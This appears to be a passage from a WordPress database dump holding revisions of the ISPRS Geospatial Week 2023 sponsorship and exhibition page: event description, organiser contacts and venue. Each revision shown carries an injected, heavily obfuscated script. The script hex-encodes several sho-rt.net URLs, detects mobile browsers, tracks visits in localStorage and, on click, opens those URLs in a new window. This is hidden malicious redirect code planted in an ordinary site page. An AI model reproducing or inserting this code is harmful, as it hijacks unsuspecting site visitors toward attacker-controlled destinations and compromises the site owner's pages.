_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 14:30:44','2022-10-26 14:30:44','',2920,'https://gsw2023.com/?p=2933',0,'revision','',0),
(2934,1,'2022-10-26 15:08:05','2022-10-26 15:08:05','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<p>&nbsp;</p>\n<p><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 15:08:05','2022-10-26 15:08:05','',2920,'https://gsw2023.com/?p=2934',0,'revision','',0),
(2935,1,'2022-10-26 15:10:50','2022-10-26 15:10:50','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 